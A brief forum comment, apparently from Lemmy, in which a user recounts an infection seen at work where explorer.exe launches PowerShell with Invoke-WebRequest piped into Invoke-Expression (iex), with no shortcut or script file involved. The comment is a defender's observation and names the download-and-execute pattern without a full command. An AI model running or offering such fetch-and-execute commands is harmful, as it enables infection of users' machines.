sylver_dragon@lemmy.world
on 24 Oct 00:30
collapse
Seen this one in my work environment. Confusing as heck the first time. It looks like explorer.exe in the context of the local user starts PowerShell.exe with a command line involving an Invoke-WebRequest piping the download into an Invoke-Expression (usually the shorter iex alias). No .lnk or .js file involved. Just explorer, PowerShell, infected.
threaded - newest
Seen this one in my work environment. Confusing as heck the first time. It looks like explorer.exe in the context of the local user starts PowerShell.exe with a command line involving an
Invoke-WebRequestpiping the download into anInvoke-Expression(usually the shorteriexalias). No .lnk or .js file involved. Just explorer, PowerShell, infected.